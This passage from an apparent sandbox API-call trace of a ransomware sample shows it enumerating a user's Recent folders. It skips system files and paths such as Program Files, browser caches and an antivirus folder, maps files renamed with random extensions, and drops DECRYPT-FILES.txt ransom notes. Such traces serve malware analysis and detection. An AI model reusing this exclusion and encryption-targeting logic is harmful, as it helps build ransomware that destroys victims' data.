(lpString1="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", lpString2="ntuser.dat.log") returned -1 [0182.209] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", lpString2="thumbs.db") returned -1 [0182.209] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7", lpString2="Bootfont.bin") returned -1 [0182.209] lstrlenW (lpString="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7") returned 49 [0182.209] lstrcmpiW (lpString1="qCIdwi7", lpString2="lnk") returned 1 [0182.209] lstrcmpiW (lpString1="qCIdwi7", lpString2="exe") returned 1 [0182.209] lstrcmpiW (lpString1="qCIdwi7", lpString2="sys") returned -1 [0182.209] lstrcmpiW (lpString1="qCIdwi7", lpString2="dll") returned 1 [0182.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0182.209] lstrlenW (lpString="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7") returned 49 [0182.209] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0182.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="7e4dca80246863e3.automaticDestinations-ms.qCIdwi7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.qCIdwi7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.qCIdwi7" [0182.209] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.210] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.qCIdwi7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms.qcidwi7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.211] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=6920) returned 1 [0182.211] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.211] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.211] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.212] CloseHandle (hObject=0x288) returned 1 [0182.212] CloseHandle (hObject=0x284) returned 1 [0182.212] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.212] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe3b6c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabe3b6c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe3b6c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.212] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.212] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bce65c0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x4bce65c0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xabed3c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf08, dwReserved0=0x0, dwReserved1=0x0, cFileName="eb282ead62b4db87.automaticDestinations-ms.rtxM", cAlternateFileName="EB282E~1.RTX")) returned 1 [0182.212] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms.rtxM", lpString2="DECRYPT-FILES.txt") returned 1 [0182.212] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms.rtxM", lpString2="autorun.inf") returned 1 [0182.212] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms.rtxM", lpString2="boot.ini") returned 1 [0182.212] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms.rtxM", lpString2="desktop.ini") returned 1 [0182.212] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms.rtxM", lpString2="ntuser.dat") returned -1 [0182.212] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms.rtxM", lpString2="iconcache.db") returned -1 [0182.212] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms.rtxM", lpString2="bootsect.bak") returned 1 [0182.212] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms.rtxM", lpString2="ntuser.dat.log") returned -1 [0182.212] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms.rtxM", lpString2="thumbs.db") returned -1 [0182.212] lstrcmpiW (lpString1="eb282ead62b4db87.automaticDestinations-ms.rtxM", lpString2="Bootfont.bin") returned 1 [0182.212] lstrlenW (lpString="eb282ead62b4db87.automaticDestinations-ms.rtxM") returned 46 [0182.212] lstrcmpiW (lpString1="rtxM", lpString2="lnk") returned 1 [0182.212] lstrcmpiW (lpString1="rtxM", lpString2="exe") returned 1 [0182.212] lstrcmpiW (lpString1="rtxM", lpString2="sys") returned -1 [0182.212] lstrcmpiW (lpString1="rtxM", lpString2="dll") returned 1 [0182.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0182.212] lstrlenW (lpString="eb282ead62b4db87.automaticDestinations-ms.rtxM") returned 46 [0182.212] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0182.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="eb282ead62b4db87.automaticDestinations-ms.rtxM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.rtxM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.rtxM" [0182.212] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.213] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.rtxM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms.rtxm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.213] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=3848) returned 1 [0182.213] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.213] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.214] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.214] CloseHandle (hObject=0x288) returned 1 [0182.214] CloseHandle (hObject=0x284) returned 1 [0182.214] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.214] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bce65c0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x4bce65c0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xabed3c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf08, dwReserved0=0x0, dwReserved1=0x0, cFileName="eb282ead62b4db87.automaticDestinations-ms.rtxM", cAlternateFileName="EB282E~1.RTX")) returned 0 [0182.214] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0182.215] CloseHandle (hObject=0x27c) returned 1 [0182.215] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9e78b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a9e78b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a9e78b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1ae6, dwReserved0=0x0, dwReserved1=0x0, cFileName="AVwBYYGM.lnk", cAlternateFileName="")) returned 1 [0182.215] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.215] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="autorun.inf") returned 1 [0182.215] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="boot.ini") returned -1 [0182.215] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="desktop.ini") returned -1 [0182.215] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="ntuser.dat") returned -1 [0182.215] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="iconcache.db") returned -1 [0182.215] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="bootsect.bak") returned -1 [0182.215] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="ntuser.dat.log") returned -1 [0182.215] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="thumbs.db") returned -1 [0182.215] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="Bootfont.bin") returned -1 [0182.215] lstrlenW (lpString="AVwBYYGM.lnk") returned 12 [0182.215] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.215] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab64670, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ab64670, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ab64670, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BeweMui.lnk", cAlternateFileName="")) returned 1 [0182.215] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.215] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="autorun.inf") returned 1 [0182.215] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="boot.ini") returned -1 [0182.215] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="desktop.ini") returned -1 [0182.215] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="ntuser.dat") returned -1 [0182.215] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="iconcache.db") returned -1 [0182.215] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="bootsect.bak") returned -1 [0182.215] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="ntuser.dat.log") returned -1 [0182.215] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="thumbs.db") returned -1 [0182.215] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="Bootfont.bin") returned -1 [0182.215] lstrlenW (lpString="BeweMui.lnk") returned 11 [0182.215] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.215] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89ee52f0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89ee52f0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89f0b450, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1503, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bp7D8ssZyaPUB.lnk", cAlternateFileName="BP7D8S~1.LNK")) returned 1 [0182.215] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.215] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="autorun.inf") returned 1 [0182.216] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="boot.ini") returned 1 [0182.216] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="desktop.ini") returned -1 [0182.216] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="ntuser.dat") returned -1 [0182.216] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="iconcache.db") returned -1 [0182.216] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="bootsect.bak") returned 1 [0182.216] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="ntuser.dat.log") returned -1 [0182.216] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="thumbs.db") returned -1 [0182.216] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="Bootfont.bin") returned 1 [0182.216] lstrlenW (lpString="Bp7D8ssZyaPUB.lnk") returned 17 [0182.216] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.216] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac95170, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ac95170, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ac95170, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf73, dwReserved0=0x0, dwReserved1=0x0, cFileName="BQQtijYG2l71UpFZBjuL.flv.lnk", cAlternateFileName="BQQTIJ~1.LNK")) returned 1 [0182.216] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.216] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="autorun.inf") returned 1 [0182.216] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="boot.ini") returned 1 [0182.216] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="desktop.ini") returned -1 [0182.216] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="ntuser.dat") returned -1 [0182.216] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="iconcache.db") returned -1 [0182.216] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="bootsect.bak") returned 1 [0182.216] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="ntuser.dat.log") returned -1 [0182.216] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="thumbs.db") returned -1 [0182.216] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="Bootfont.bin") returned 1 [0182.216] lstrlenW (lpString="BQQtijYG2l71UpFZBjuL.flv.lnk") returned 28 [0182.216] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.216] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x894a1410, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x894a1410, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x894a1410, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xec7, dwReserved0=0x0, dwReserved1=0x0, cFileName="CjScda.lnk", cAlternateFileName="")) returned 1 [0182.216] lstrcmpiW (lpString1="CjScda.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.216] lstrcmpiW (lpString1="CjScda.lnk", lpString2="autorun.inf") returned 1 [0182.216] lstrcmpiW (lpString1="CjScda.lnk", lpString2="boot.ini") returned 1 [0182.216] lstrcmpiW (lpString1="CjScda.lnk", lpString2="desktop.ini") returned -1 [0182.216] lstrcmpiW (lpString1="CjScda.lnk", lpString2="ntuser.dat") returned -1 [0182.216] lstrcmpiW (lpString1="CjScda.lnk", lpString2="iconcache.db") returned -1 [0182.217] lstrcmpiW (lpString1="CjScda.lnk", lpString2="bootsect.bak") returned 1 [0182.217] lstrcmpiW (lpString1="CjScda.lnk", lpString2="ntuser.dat.log") returned -1 [0182.217] lstrcmpiW (lpString1="CjScda.lnk", lpString2="thumbs.db") returned -1 [0182.217] lstrcmpiW (lpString1="CjScda.lnk", lpString2="Bootfont.bin") returned 1 [0182.217] lstrlenW (lpString="CjScda.lnk") returned 10 [0182.217] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.217] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c37a30, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8adebdd0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8adebdd0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe49, dwReserved0=0x0, dwReserved1=0x0, cFileName="COGT.lnk", cAlternateFileName="")) returned 1 [0182.217] lstrcmpiW (lpString1="COGT.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.217] lstrcmpiW (lpString1="COGT.lnk", lpString2="autorun.inf") returned 1 [0182.217] lstrcmpiW (lpString1="COGT.lnk", lpString2="boot.ini") returned 1 [0182.217] lstrcmpiW (lpString1="COGT.lnk", lpString2="desktop.ini") returned -1 [0182.217] lstrcmpiW (lpString1="COGT.lnk", lpString2="ntuser.dat") returned -1 [0182.217] lstrcmpiW (lpString1="COGT.lnk", lpString2="iconcache.db") returned -1 [0182.217] lstrcmpiW (lpString1="COGT.lnk", lpString2="bootsect.bak") returned 1 [0182.217] lstrcmpiW (lpString1="COGT.lnk", lpString2="ntuser.dat.log") returned -1 [0182.217] lstrcmpiW (lpString1="COGT.lnk", lpString2="thumbs.db") returned -1 [0182.217] lstrcmpiW (lpString1="COGT.lnk", lpString2="Bootfont.bin") returned 1 [0182.217] lstrlenW (lpString="COGT.lnk") returned 8 [0182.217] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.217] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac10f0e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac10f0e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0182.217] lstrcmpW (lpString1="CustomDestinations", lpString2=".") returned 1 [0182.217] lstrcmpW (lpString1="CustomDestinations", lpString2="..") returned 1 [0182.217] lstrcatW (in: lpString1="CustomDestinations", lpString2="\\" | out: lpString1="CustomDestinations\\") returned="CustomDestinations\\" [0182.217] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Program Files") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch=":\\Windows") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Games\\") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\All Users") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="AhnLab") returned 0x0 [0182.218] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.218] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.218] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\0a16c9.tmp") returned 101 [0182.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0182.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.220] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.220] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\DECRYPT-FILES.txt") returned 108 [0182.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.221] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0182.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0182.221] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefa2da80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefa2da80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0182.221] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.221] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, 